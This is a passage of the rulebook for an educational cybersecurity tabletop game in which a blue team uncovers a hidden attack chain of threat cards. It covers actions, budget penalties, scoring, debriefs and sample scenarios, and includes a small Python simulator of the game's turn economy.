| --- | --- | --- |
| Incident Response | Cyber kill chain, attack detection, investigation | Resource prioritization, incident response |
| Hardening | Defense-in-depth, layering, proactive security | Cost-benefit analysis, security architecture |
| Disaster Recovery | Crisis management, stakeholder communication | Risk assessment, incident cost |
| Network Building | Network design, asset security, architecture | Infrastructure hardening, threat modeling |
| Forensics | Digital forensics, chain of custody, attribution | Evidence handling, MITRE ATT&CK mapping |
| Audit & Compliance | Security assessment, governance, compliance | Risk identification, remediation prioritization |

By Game Mechanic

| Mechanic | What It Teaches |
| --- | --- |
| d20 roll system | Uncertainty, risk, informed decision-making |
| Budget constraints | Resource allocation, prioritization |
| Justification bonuses | Technical reasoning, tools/techniques knowledge |
| Uncontained Threats penalty | Urgency, cost of dwell time |
| Pentester Tactics | Attacker sophistication, defense limitations |
| Playbook system | Preparation, incident response planning |
| Scoring systems | Outcome measurement, quality assessment |

Cooperative vs. Competitive Play

Cooperative Mode

Competitive Mode

Implementation:
  - Same setup for all teams
  - Teams cannot share information (Incident Response)
  - Score comparison determines winner (Hardening)
  - Reputation comparison (Disaster Recovery)


Debrief & Reflection (Universal)

Every module should include a 5-15 minute debrief with three sections:

Part 1: What Happened?

Part 2: Why Did That Happen?

Part 3: What Would You Do Differently?


Tips for Threat Orchestrators (Universal)

Before the Game

  1. Read the module rules completely - Know what's coming
  2. Prepare your scenario - Pre-build attack chain or threat context
  3. Organize materials - Sort cards, prepare trackers
  4. Know your balancing points - Be ready to adjust difficulty if needed
  5. Practice reading clues - Deliver them dramatically!

During Gameplay

  1. Be clear about costs - Announce Budget before action
  2. Resolve rolls immediately - Announce target, let player roll, resolve
  3. Ask clarifying questions - "Why are you investigating email headers?"
  4. Be fair but challenging - Give honest difficulty, don't fudge rolls
  5. Narrate outcomes - Describe what happens, not just success/failure
  6. Manage pacing - Keep turns moving (2-3 min discussion max)
  7. Track penalties accurately - Keep budget, turn, and threat trackers visible

Balancing Difficulty

Too Easy Signs:
  - Team reveals all cards/achieves the goal with 40+ Budget remaining
  - No failed rolls
  - No meaningful decisions required
  - Team is bored

Too Hard Signs:
  - Team is stuck/making no progress after 5 turns
  - Multiple consecutive failed rolls
  - Team frustrated rather than challenged
  - No learning happening

Adjustment Options:
  - Easier: Provide better clues, more starting budget, fewer tactics
  - Harder: Less specific clues, lower budget, more tactics
  - Faster: Shorter turn limits, simpler scenarios
  - Slower: More turns, more complex scenarios


Card Reference

For complete card descriptions, see:
  - Base Threat & Defense Cards: cards/incident-response/core-deck/threat-defense-cards.md
  - Expansion Threats: cards/incident-response/expansion-deck/advanced-threats.md
  - Expansion Defenses: cards/incident-response/expansion-deck/advanced-defenses.md
  - All decks indexed: cards/CARD_REFERENCE.md


Module-Specific Rules

For complete rules on each module:


Quick Reference: Universal Mechanics

d20 Roll System

Budget System

Turn System

Penalties & Bonuses


Continuing to Next Steps

For your first game:
  1. Choose a module from Module Combinations
  2. Read the module-specific rules
  3. Read the standalone setup guide
  4. Prepare your scenario
  5. Play!

For multiple modules:
  1. Refer to Module Combinations for recommended sequences
  2. Refer to FRAMEWORK.md for modifier generation procedures
  3. Play the first module, then generate modifiers for the next
  4. Continue as desired


Need Help?


Incident Zero: Core Rules & Mechanics · v2.1 - Balanced & Refined Edition · Universal rules for all modules

docs/rules/module-incident-response.md

Incident Response Module: Rules & Mechanics

Version: 2.2 - Playtest Edition · Last Updated: July 2026


Module Overview

The Incident Response Module is the foundation of Incident Zero. Players act as a security operations center (SOC) team responding to an active cyberattack. The core challenge: reveal a hidden attack chain before time runs out or budget is exhausted.

This module teaches:
  - Primary: Cyber kill chain understanding, threat detection, evidence gathering
  - Secondary: Resource prioritization, incident response under pressure, forensic investigation

Key Mechanics:
  - Hidden attack chain (3-5 Threat Cards) is pre-built by the Threat Orchestrator
  - Blue Team reveals cards by successful investigation (two successes on the same chain link, v2.2) or by deploying a vector+step-matching defense
  - Uncontained Threats Penalty creates urgency—revealed threats cost 5 Budget per turn until contained
  - Active Breach Cost (v2.2)—while any chain card remains hidden, the breach itself costs 5 Budget per turn (dwell time is never free)
  - Emergency Response action provides a way to contain uncontained threats (15 Budget, v2.2)


Module Setup (5 minutes)

1. Choose Difficulty Level

Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.

| Difficulty | Chain Length | Starting Budget | Turn Limit | Best For |
|---|---|---|---|---|
| Beginner | 3 cards | 100 | 7 turns | First playthrough, basic learning |
| Intermediate | 4 cards | 100 | 9 turns | Standard play, mixed experience |
| Advanced | 5 cards | 100 | 11 turns | Experienced players, challenge |

Scaling Notes:
  - Beginner: ~30 min session, teaches the full kill chain at a comfortable pace
  - Intermediate: ~40 min session, requires a focused investigation strategy
  - Advanced: ~45 min session, demands efficient resource allocation and quick thinking
  - Advanced Threat Orchestrators can instead use the Tier + d4 system in Core Rules §3a

2. Threat Orchestrator Preparation

Create the Hidden Attack Chain:
  1. Select 3-5 Threat Cards from the deck
  2. Arrange them in logical attack chain sequence:
     - First card: INITIAL COMPROMISE
     - Middle cards: PIVOT & ESCALATE, PERSISTENCE
     - Final card: C2 & EXFIL
  3. Write down clues for each hidden card on separate paper (keep hidden from Blue Team)
  4. Place relevant Asset Cards on the table (visible to all—provides scenario context). Asset Cards are shared components: see cards/network-building/core-deck/asset-cards.md

Attack Chain Strategy Tips:
  - Start simple (Beginner): Phishing → Lateral Movement → Database Exfil
  - Intermediate: Phishing → Credential Dumping → VPN Access → Persistence → C2 Beaconing
  - Advanced: Web Exploit → Lateral Movement → Privilege Escalation → Data Staging → Exfiltration

Recommended First-Time Scenario (3 cards, 30 minutes):
  1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING)
  2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
  3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)

3. Blue Team Setup

Initialize trackers and materials:

| Item | Starting Value |
|---|---|
| Turn Tracker | 1 |
| Budget Tracker | 100 |
| Uncontained Threats Tracker | 0 |
| Defense Cards | Draw 5 (face down) |

4. Read the Opening Scenario

Threat Orchestrator delivers opening narrative using only the first hidden card's clue. Example:

"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets.

You have limited time and budget to investigate before the attacker escalates. What do you do?"


Gameplay Loop (25-35 minutes)

Round Structure

Each turn represents approximately 2-4 hours of incident response operations.

COMPLETE TURN SEQUENCE:

1. START OF TURN
  - Apply Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget from the tracker
  - Apply Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (the hidden breach is doing damage while you can't see it)
  - Announce current turn number and budget remaining
  - Example: "Turn 3. Start-of-turn costs: 5 for your uncontained threat, plus 5 Active Breach Cost—the chain isn't fully mapped yet. Budget drops from 85 to 75."

2. BLUE TEAM'S TURN (2-3 minutes discussion)
  - Team discusses incident response strategy
  - Decides on ONE action to take this turn (Investigate, Deploy Defense, or Emergency Response)
  - Team member announces the action and its parameters (what they're investigating, which defense they're deploying, etc.)

3. ACTION RESOLUTION
  - Perform the chosen action (see the three actions below)
  - Roll 1d20 if the action requires a roll
  - Apply modifiers (see modifier rules in core-rules.md)
  - Resolve the outcome immediately

4. END OF TURN
  - Advance Turn Tracker by 1
  - Draw 1 new Defense Card (add to hand)
  - Check if the game has been won or lost (see victory/defeat conditions below)
  - If still playing, return to START OF TURN

Sequential Discovery (v2.2 clarification)

The attack chain is discovered in order: only the earliest unrevealed chain card can be investigated toward or revealed. Clues, investigation successes, and Deploy Defense reveals all target that card until it is face-up, then attention shifts to the next link. This matches how the clue system walks the kill chain.

Deployed Defense Persistence (v2.2)

Deployed defenses stay on the table and keep working. Whenever the chain link currently being targeted has an Attack Vector matching a deployed defense's Countermeasure Vector, add +2 to Investigate and Deploy Defense rolls against that link. The Threat Orchestrator (who knows the hidden vector) announces when this bonus applies—hearing "your deployed defenses are helping here" is itself a useful clue. This rule is stated once here; other sections simply refer to it.


Three Incident Response Actions

Action 1: Investigate 🔎

Cost: 5 Budget per action
Roll Required: roll + modifiers ≥ 11 on d20
Special Rule: Modifiers apply and can stack

How It Works:

  1. Team describes what they're investigating (email headers, system logs, network traffic, memory dumps, etc.)
  2. Provide technical justification for your investigation approach
  3. Roll 1d20
  4. Compare: roll + modifiers ≥ 11?

Roll Modifiers:

| Bonus | When Awarded | Examples |
|---|---|---|
| +2 | Strong technical justification | "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds. This helps us understand the initial compromise vector." |
| +1 | Real security tools/techniques referenced | "We'll query our SIEM for scheduled task creation events" or "We're checking for Mimikatz usage in memory" |
| +2 | Deployed Defense Persistence (v2.2) | A deployed defense's vector matches the targeted chain link (see rule above) |
| +0 | Vague investigation | "We want to find suspicious activity" |

Success (roll + modifiers ≥ 11) — Investigation successes accumulate (v2.2):
  - First success against a chain link: TO provides a verbal clue about that card (the earliest unrevealed card in the chain)
  - Second success against the same chain link: THE CARD IS REVEALED! Place it face-up; it becomes uncontained (add 1 to the Uncontained Threats Tracker) and the team chooses a Discovery Reward
  - Clues should be dramatic and progressive—give more detail with each successful investigation
  - Budget is spent (5 is deducted)

Failure (roll + modifiers < 11):
  - "Your investigation yields no actionable intelligence at this time"
  - Budget is spent anyway (5 is deducted)
  - Team learns nothing, but time advances
  - Failure is realistic—not every investigation uncovers information
  - Failures do NOT count toward the two accumulated successes

Strategic Consideration:
  - Cheap action (only 5 Budget)
  - Moderate success chance (need 11+ on d20, so ~50% without bonuses)
  - Two successful investigations reveal a card without needing the right Defense Card in hand (v2.2)
  - Deploy Defense (full match) is faster—one successful roll—but costs more and needs the right card


Action 2: Deploy a Defense 🛡️

Cost: 10/15/25 Budget (depending on Defense Card tier: BASIC/ADVANCED/ELITE)
Roll Required: roll + modifiers ≥ 11 on d20
Special Rule: Modifiers apply; matching defense to threat reveals cards immediately

How It Works:

  1. Choose a Defense Card from your hand
  2. Target a specific Asset or threat vector (state what you're defending)
  3. Explain your strategy (optional but encouraged for +2 modifier): "Why is this defense appropriate for the current situation?"
  4. Roll 1d20
  5. Compare: roll + modifiers ≥ 11?

Roll Modifiers: Same as Investigate action (+2 for justification, +1 for tools, +2 Deployed Defense Persistence if applicable)

Success (roll + modifiers ≥ 11):

Check if the Defense Card matches the earliest unrevealed hidden threat (sequential discovery):
  - FULL MATCH: Defense Countermeasure Vector matches the threat's Attack Vector AND it's the correct step in the chain
  - THREAT CARD IS REVEALED IMMEDIATELY! Threat card is placed face-up on the table. Blue Team learns what they've been fighting.
  - Threat card is now "uncontained" (add 1 to Uncontained Threats Tracker)
  - Defense Card is discarded (used)
  - Budget is spent

Failure (roll + modifiers < 11):
  - Defense fails to deploy properly
  - Budget is spent anyway
  - Card is discarded
  - No progress made, but the team learns from failure

Key Point: Even "unsuccessful" Defense deployments can be strategically valuable. Deployed defenses stay in play and grant +2 to rolls against later threats that match their vector (v2.2).

Strategic Consideration:
  - Expensive action (10-25 Budget, scales with defense tier)
  - Moderate success chance (same 11+ threshold as Investigate)
  - Two potential rewards: Defense deployment AND card reveal
  - High-risk/high-reward compared to Investigate

Example Scenario:

Hidden attack chain: Phishing → Lateral Movement → Database Exfil

Team believes phishing is happening (first card).
They deploy D-01 "Email Authentication Setup" (BASIC, 10 Budget).
Email Authentication addresses SOCIAL ENGINEERING vector.

Roll: 8 + 2 (strong justification) = 10 = FAIL
Email deployment fails, 10 Budget spent, card discarded.

Next turn: Same team deploys D-02 "User Security Training" (BASIC, 10 Budget).
Roll: 13 + 1 = 14 = SUCCESS
Defense addresses SOCIAL ENGINEERING vector and is INITIAL COMPROMISE step.
PHISHING CAMPAIGN REVEALED! Threat card placed face-up.
Uncontained Threats increases to 1 (now costing 5 Budget per turn).

Action 3: Emergency Response 🚨

Cost: 15 Budget (v2.2 — repriced from 25; flat cost)
Roll Required: None—this always succeeds
Special Rule: Only works on previously revealed threats

How It Works:

  1. Choose a revealed Threat Card still in play (face-up on table)
  2. Describe your containment strategy in detail, for example:
     - Quarantine infected systems
     - Disable compromised accounts
     - Isolate network segments
     - Kill active processes
     - Revoke stolen credentials
  3. Pay the 15 Budget cost
  4. Card is immediately removed from play
  5. Uncontained Threats Tracker decreases by 1 (penalty stops for this threat)

Strategic Use Cases:

Example Timeline (one action per turn):

Turn 3: Deploy Defense succeeds → PHISHING revealed → Uncontained Threats = 1
Turn 4: START → Deduct 5 (uncontained) + 5 (Active Breach Cost, 2 cards still hidden)
        ACTION → Emergency Response on Phishing: pay 15 Budget
        → Phishing removed from play, Uncontained Threats = 0
Turn 5: START → Deduct only 5 (Active Breach Cost; no uncontained threats)

Uncontained Threats & Active Breach Cost

These are the core urgency mechanics of Incident Response. Dwell time costs money—whether you can see the threat or not.

How the Uncontained Threats Penalty Works

Step 1: Threat Revealed
  - When a Threat Card is successfully revealed (by two investigation successes or a full-match defense deployment)
  - Add 1 to the Uncontained Threats Tracker
  - This threat is now "active" and dangerous

Step 2: Penalty Applied at Turn Start
  - At the START of every turn, deduct 5 Budget per uncontained threat
  - Example: 2 uncontained threats = 10 Budget penalty each turn
  - This creates continuous pressure—you MUST contain threats or lose resources

Step 3: Auto-Mitigation
  - When the next card in the attack chain is revealed, the previous uncontained threat is automatically "contained" (represents the shift of attention to the new priority)
  - Uncontained Threats Tracker decreases by 1
  - Penalties decrease immediately

Step 4: Emergency Response Containment
  - Team can use the Emergency Response action to immediately remove a threat from the board
  - Cost: 15 Budget (v2.2)
  - Uncontained Threats Tracker decreases by 1

Active Breach Cost (v2.2)

Example Walkthrough (v2.2 — recomputed)

SETUP: 3-card chain (Phishing → Lateral Movement → Database Exfil)
Budget 100, Turn Limit 7 [(3 × 2) + 1]

Turn 1: START → Active Breach Cost -5 (95). No uncontained threats.
        INVESTIGATE email headers (-5, 90). Roll succeeds.
        → 1st success vs. link 1: clue about the phishing campaign.

Turn 2: START → Active Breach Cost -5 (85).
        INVESTIGATE mail gateway logs (-5, 80). Roll succeeds.
        → 2nd success vs. link 1: ✓ PHISHING CAMPAIGN REVEALED (investigation reveal, v2.2)
        Uncontained Threats = 1. Reward: Budget Grant +10 (90).

Turn 3: START → -5 (uncontained) -5 (Active Breach) = 80.
        INVESTIGATE network logs (-5, 75). Roll succeeds.
        → 1st success vs. link 2: clue about SMB lateral movement.

Turn 4: START → -5 (uncontained) -5 (Active Breach) = 65.
        DEPLOY D-09 Network Segmentation (ADVANCED, -15, 50). Roll succeeds.
        FULL MATCH (NETWORK vector, PIVOT & ESCALATE step)
        → ✓ LATERAL MOVEMENT REVEALED immediately (deploy reveal)
        Phishing auto-mitigates; Lateral Movement now uncontained (still 1 total).
        Reward: Budget Grant +10 (60).

Turn 5: START → -10 (50).
        INVESTIGATE database access logs (-5, 45). Roll fails. No progress.

Turn 6: START → -10 (35).
        INVESTIGATE DLP alerts (-5, 30). Roll succeeds.
        → 1st success vs. link 3: clue about bulk data leaving the database.

Turn 7: START → -10 (20).
        DEPLOY D-11 Data Loss Prevention (ADVANCED, -15, 5). Roll succeeds.
        FULL MATCH (DATA EXFIL vector, C2 & EXFIL step)
        → ✓ DATABASE EXFILTRATION REVEALED — final card!
        Victory is checked IMMEDIATELY (before any start-of-turn penalties).

WIN on the final turn with 5 Budget remaining.

(Arithmetic check, turn by turn: 100 → 95 → 90 | 85 → 80 → +10 = 90 | 80 → 75 | 65 → 50 → +10 = 60 | 50 → 45 | 35 → 30 | 20 → 5.)


Winning & Losing

Victory Condition ✓

Blue Team wins Incident Response if:
  1. ALL threat cards in the attack chain are revealed (face-up on table), AND
  2. This happens within the turn limit (7/9/11 by chain length, per Core Rules §3a)

Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties would apply. Revealing the last card on your final turn with 0 Budget remaining is still a win.

Defeat Condition ✗

Blue Team loses Incident Response if:
  1. Turn Tracker exceeds the turn limit with unrevealed cards remaining, OR
  2. The team cannot take any legal action (see Budget Edge Rules below)

Losing Scenarios:
  - Turns expired with only 2 of 4 cards revealed = attack succeeded
  - Budget too low to afford any action = response ran out of resources

Budget Edge Rules (v2.2)

Victory Scoring (Optional)

If you want to measure quality of victory:

Victory Points Formula:
Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / Starting Budget) × 50

Examples:
- 4 of 4 cards revealed, 35 Budget remaining: (4/4 × 50) + (35/100 × 50) = 50 + 17.5 = 67.5/100 (Victory with good efficiency)
- 3 of 4 cards revealed, 15 Budget remaining: (3/4 × 50) + (15/100 × 50) = 37.5 + 7.5 = 45/100 (Partial victory, struggled)
- 2 of 4 cards revealed, 0 Budget: (2/4 × 50) + (0 × 50) = 25/100 (Defeat)
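The turn economy described above (start-of-turn penalties, auto-mitigation, Emergency Response, the immediate victory check, the walkthrough's arithmetic) and the Victory Points formula are easy to get wrong at the table, so here is a small Python simulator that encodes them. It is an added example, not part of the game's own materials. The die rolls in the replay are constructed, because the walkthrough only says whether each roll succeeded; the Discovery Reward is modelled as a parameter (Budget Grant adds 10, the other two rewards have no budget effect here), and, like the walkthrough, the replay takes no reward on the final reveal.

```python
# Turn-economy simulator for the Incident Response module (v2.2 rules). Added example,
# not part of the game's materials; rolls in replay_worked_example() are constructed.
from dataclasses import dataclass, field
from typing import List, Optional

INVESTIGATE_COST, EMERGENCY_COST = 5, 15
DEFENSE_COST = {"BASIC": 10, "ADVANCED": 15, "ELITE": 25}
UNCONTAINED_PENALTY = 5   # per uncontained threat, at turn start
ACTIVE_BREACH_COST = 5    # at turn start while any chain card is hidden
BUDGET_GRANT = 10         # Discovery Reward option 2
ROLL_TARGET = 11          # roll + modifiers >= 11 succeeds


def turn_limit(chain_length: int) -> int:
    """Variable Game Length: (chain cards x 2) + 1, i.e. 7/9/11 turns."""
    return chain_length * 2 + 1


def victory_points(revealed: int, total: int, budget: int, starting: int = 100) -> float:
    """Optional scoring: 50 points for completeness, 50 for budget efficiency."""
    return revealed * 50 / total + budget * 50 / starting


@dataclass
class IncidentResponseGame:
    chain_length: int
    budget: int = 100
    turn: int = 1
    revealed: int = 0            # face-up chain cards; discovery is sequential
    uncontained: int = 0
    successes_on_link: int = 0   # accumulated Investigate successes vs. the current link
    won: bool = False
    lost: bool = False
    trace: List[int] = field(default_factory=list)  # budget after every change

    def start_of_turn(self) -> None:
        cost = self.uncontained * UNCONTAINED_PENALTY
        if self.revealed < self.chain_length:
            cost += ACTIVE_BREACH_COST            # dwell time is never free
        self.budget = max(0, self.budget - cost)  # budget floors at 0
        self.trace.append(self.budget)
        if self.budget < INVESTIGATE_COST:        # Investigate is the cheapest legal action
            self.lost = True

    def _spend(self, cost: int) -> None:
        if self.budget < cost:
            raise ValueError("actions require their full cost")
        self.budget -= cost
        self.trace.append(self.budget)

    def _reveal(self, reward: Optional[str]) -> None:
        # Auto-mitigation: the previous threat is contained as the new one becomes
        # uncontained, so the tracker only changes when it was 0.
        self.uncontained = max(self.uncontained, 1)
        self.revealed += 1
        self.successes_on_link = 0
        if self.revealed == self.chain_length:
            self.won = True                       # checked immediately, before any penalty
        if reward == "budget":                    # other Discovery Rewards have no budget effect
            self.budget += BUDGET_GRANT
            self.trace.append(self.budget)

    def investigate(self, roll: int, modifiers: int = 0, reward: Optional[str] = "budget") -> str:
        self._spend(INVESTIGATE_COST)
        if roll + modifiers < ROLL_TARGET:
            return "no intel"                     # failures never count toward the two successes
        self.successes_on_link += 1
        if self.successes_on_link < 2:
            return "clue"
        self._reveal(reward)
        return "revealed"

    def deploy_defense(self, tier: str, roll: int, modifiers: int = 0,
                       full_match: bool = False, reward: Optional[str] = "budget") -> str:
        self._spend(DEFENSE_COST[tier])
        if roll + modifiers < ROLL_TARGET:
            return "failed"
        if not full_match:
            return "deployed"                     # stays in play for the +2 persistence bonus
        self._reveal(reward)                      # vector AND chain step matched
        return "revealed"

    def emergency_response(self) -> None:
        self._spend(EMERGENCY_COST)               # no roll; needs a revealed threat in play
        self.uncontained = max(0, self.uncontained - 1)

    def end_of_turn(self) -> None:
        if not self.won:
            self.turn += 1
            self.lost = self.lost or self.turn > turn_limit(self.chain_length)


def replay_worked_example() -> IncidentResponseGame:
    """Replay the 3-card walkthrough; no reward is taken on the final reveal."""
    game = IncidentResponseGame(chain_length=3)
    script = [  # (method, kwargs): one action per turn, T1..T7; rolls are constructed
        ("investigate", dict(roll=14)),                                   # clue on link 1
        ("investigate", dict(roll=9, modifiers=3)),                       # Phishing revealed, +10
        ("investigate", dict(roll=16)),                                   # clue on link 2
        ("deploy_defense", dict(tier="ADVANCED", roll=13, full_match=True)),  # Lateral Movement
        ("investigate", dict(roll=6)),                                    # fails
        ("investigate", dict(roll=11)),                                   # clue on link 3
        ("deploy_defense", dict(tier="ADVANCED", roll=18, full_match=True, reward=None)),
    ]
    for method, kwargs in script:
        game.start_of_turn()
        getattr(game, method)(**kwargs)
        if game.won:
            break
        game.end_of_turn()
    return game
```

`replay_worked_example().trace` reproduces the budget sequence from the arithmetic check (100 → 95 → 90 … → 5, win on turn 7). Editing the script is a quick way to test a defence-led or investigation-led variant for solvency before bringing it to a table.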

Discovery Rewards

When your team successfully reveals a Threat Card, immediately choose ONE of these rewards:

Reward Option 1: Intelligence Bonus 📚

Reward Option 2: Budget Grant 💰

Reward Option 3: Fast-Track Investigation 🚀

Important: Choose only ONE reward per card reveal. Cannot combine rewards.


Debrief & Reflection (5-10 minutes)

Every game should conclude with guided reflection connecting game mechanics to real security concepts.

For Winners (Questions about Success)

  1. "What was your investigation strategy? What worked best?"
  2. Explore which investigation themes were most successful
  3. Discuss whether they targeted the right logs/evidence first

  4. "Which action type was most effective for you—Investigate or Deploy Defense?"

  5. Some teams succeed with heavy investigation, others with defense-focused discovery
  6. Both are valid; discuss trade-offs (v2.2: investigation reveals need two successes but cost less)

  7. "How did the Uncontained Threats penalty and Active Breach Cost affect your decisions?"

  8. Did they force you to make reactive decisions?
  9. Were they realistic representations of incident response and dwell-time costs?

  10. "If you replayed, what would you do differently?"

  11. Reflection on optimization and efficiency
  12. Planning better strategies for next playthrough

For Losers (Questions about Learning)

  1. "What went wrong in your investigation? Where did you get stuck?"
  2. Identify which threat was hardest to detect and why
  3. Discuss investigation approaches that didn't work

  4. "Would you have benefited from more defense deployments vs. investigations?"

  5. Analyze if budget allocation strategy was optimal
  6. Discuss risk/reward trade-offs

  7. "How would you investigate differently if you could replay?"

  8. Recovery and learning from failure
  9. Strategic adjustments for next attempt

  10. "What was the attacker's complete kill chain?"

  11. TO reveals the full hidden attack chain (all cards, clues, explanations)
  12. Discussion of what signals should have tipped them off

For Everyone (Real-World Connection)

  1. "What was the attacker's complete kill chain? Which step was most critical?"
  2. Understand the full attack story
  3. Discuss which card took longest to detect and why

  4. "Why isn't this easy to detect in real-world networks?"

  5. Real attacks hide in massive volumes of legitimate traffic
  6. Attackers use living-off-the-land techniques
  7. Detection requires specific telemetry (EDR, SIEM, network monitoring)

  8. "What tool or process would have helped you detect faster?"

  9. Threat hunting
  10. Behavioral analytics
  11. Specific log sources (PowerShell logs, Sysmon, Zeek)
  12. User and Entity Behavior Analytics (UEBA)

  13. "How does game dwell time compare to real breaches?"

  14. Average dwell time in real breaches: 200+ days
  15. Game represents 2-8 hours of focused investigation
  16. The Active Breach Cost models why every day of dwell time hurts

Tips for Threat Orchestrators

Before the Game (Preparation)

  1. Read the module rules completely - Understand Investigate, Deploy Defense, and Emergency Response mechanics
  2. Prepare your attack chain - Pre-build or write down your 3-5 hidden cards in sequence
  3. Write clear clues - For each card, write 2-3 progressive clues that reveal information gradually (v2.2: expect up to two clue deliveries per card before an investigation reveal)
  4. Organize materials - Sort Defense Cards by tier, prepare trackers, have dice ready
  5. Practice reading clues dramatically - Deliver them with narrative flair to create engagement

Crafting Effective Clues

Poor clue (too vague, gives nothing away):
  - "You find something suspicious"
  - "There's a threat somewhere"

Bad clue (gives it away completely):
  - "The attacker used Mimikatz to dump credentials from LSASS memory"
  - "You have a database exfiltration happening right now"

Good clue (progressive disclosure, dramatic delivery):
  - "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."

Excellent clue (specific without revealing, creates narrative):
  - "Your EDR shows PowerShell activity with suspicious encoding. Memory access patterns suggest credential harvesting. Your domain admin cached credentials appear to have been targeted."

Balancing Difficulty During Play

The game is TOO EASY if:
  - Team reveals all cards in the first half of the turn limit with 60+ Budget remaining
  - Multiple consecutive successful rolls (unlikely with d20)
  - Clues are too specific/obvious
  - Team makes no difficult decisions

Action: Make clues more subtle, reduce starting budget next time, or add an extra card to the chain

The game is TOO HARD if:
  - Team gets stuck after revealing only 1 card (4+ turns with no progress)
  - Multiple consecutive failed rolls
  - Team is frustrated rather than challenged
  - Team is out of ideas about what to investigate

Action: Provide more explicit clues, increase starting budget, reduce chain length

Adjustment Options:
  - Chain Length: 3 (easier) vs. 4 (medium) vs. 5 (harder) — the turn limit scales automatically via (chain × 2) + 1
  - Clue Quality: More specific/obvious (easier) vs. subtle (harder)
  - Starting Budget: 80 (harder) vs. 100 (medium) vs. 120 (easier)
  - Turn Limit: formula −1 (harder) vs. formula (medium) vs. formula +1 (easier)

Running Competitive Games (Multiple Teams)

If running for tournament or competitive context:

  1. Assign different attack chains to each team (or same chain for scoring comparison)
  2. Teams cannot see each other's progress (prevents copying strategies)
  3. Scoring: First team to reveal all cards wins; tiebreaker is most Budget remaining
  4. Set clear turn/budget limits before game starts
  5. Track publicly so teams know they're racing against time/budget

Sample Scenarios to Try

Scenario 1: "Startup Breach" (Beginner, 3 cards, 30 minutes)

Attack Chain:
  1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING)
  2. T-06: Mimikatz Credential Dumping (PIVOT & ESCALATE - CREDENTIAL ABUSE)
  3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)

Starting Budget: 100 · Turn Limit: 7 [(3 × 2) + 1]

Narrative Setup:

"Your startup just deployed a new customer database. An employee clicked a malicious link in an email claiming to be from IT. Security monitoring detected unusual PowerShell activity after that. Now you're investigating what happened."

Focus: Teaching full kill chain detection (initial → credential harvesting → data theft)
Expected Duration: 30 minutes
Best For: First-time players, classroom introduction

Sample Defenses in Starting Hand:
  - D-01: Email Authentication Setup (BASIC, 10)
  - D-02: User Security Training (BASIC, 10)
  - D-07: Multi-Factor Authentication (ADVANCED, 15)
  - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15)
  - D-11: Data Loss Prevention (ADVANCED, 15)


Scenario 2: "Nation-State Campaign" (Intermediate, 4 cards, 40 minutes)

Attack Chain:
  1. T-02: Watering Hole Attack (INITIAL COMPROMISE - WEB EXPLOIT)
  2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
  3. T-07: Scheduled Task Persistence (PERSISTENCE - MALWARE)
  4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK)

Starting Budget: 100 · Turn Limit: 9 [(4 × 2) + 1]

Narrative Setup:

"Your organization's industry-specific website was silently compromised last month. A sophisticated attacker injected malicious code that targeted specific visitor browsers. One of your engineers visited the site and became infected. You're detecting strange network activity but aren't sure what's happening."

Focus: Sophisticated attack with multiple detection points; requires multiple defense/investigation attempts
Expected Duration: 40 minutes
Best For: Experienced players, demonstrating a complex kill chain

Sample Defenses:
  - D-18: Intrusion Prevention System (IPS) (ADVANCED, 15)
  - D-09: Network Segmentation (ADVANCED, 15)
  - D-04: Network Firewall Rules (BASIC, 10)
  - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15)
  - D-13: Threat Hunting Program (ELITE, 25)
  - D-14: Memory Forensics (ELITE, 25)


Scenario 3: "Advanced Ransomware Supply Chain" (Advanced, 5 cards, 45 minutes)

Attack Chain:
  1. T-13: Compromised Software Vendor Update (INITIAL COMPROMISE - MALWARE)
  2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
  3. T-05: Privilege Escalation via Kernel Exploit (PIVOT & ESCALATE - MALWARE)
  4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK)
  5. T-11: Ransomware Payload Deployment (C2 & EXFIL - MALWARE)

Starting Budget: 100 · Turn Limit: 11 [(5 × 2) + 1]

Narrative Setup:

"A trusted software vendor released an update to your monitoring tools three weeks ago. Today, you're detecting ransomware-like activity across your infrastructure. You suspect the vendor update was compromised. Can you trace the attack chain before the ransomware wakes up?"

Focus: Complex supply-chain-initiated attack; requires pattern recognition; high pressure
Expected Duration: 45 minutes
Best For: Advanced players, demonstrating supply chain risk

Sample Defenses:
  - D-17: Advanced Malware Sandbox (ELITE, 25) — detonates vendor updates before deployment
  - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15)
  - D-09: Network Segmentation (ADVANCED, 15)
  - D-03: Windows Update Patching (BASIC, 10) — closes the kernel exploit
  - D-14: Memory Forensics (ELITE, 25)
  - D-19: Backup & Disaster Recovery (BASIC, 10)
  - D-11: Data Loss Prevention (ADVANCED, 15)


Extensions & Variations

Variation 1: Solo Play Mode

How to Play Solo:
  - Single player acts as both Blue Team AND Threat Orchestrator
  - Orchestrator creates the attack chain before the game starts
  - Orchestrator then "steps back" to investigate (hard mode: don't peek at hidden cards)
  - Requires discipline: don't use knowledge of the chain to guide rolls

Best For: Individual learning, skill practice


Variation 2: Speed Mode

Compress the Game:
  - Reduce the turn limit by 2 (e.g., a 3-card chain plays in 5 turns instead of 7)
  - Optional: Remove Uncontained Threats penalty and Active Breach Cost (less bookkeeping)
  - Budget costs stay the same
  - Budget starts at 120 to balance speed pressure

Best For: Experienced teams wanting high-stakes challenge


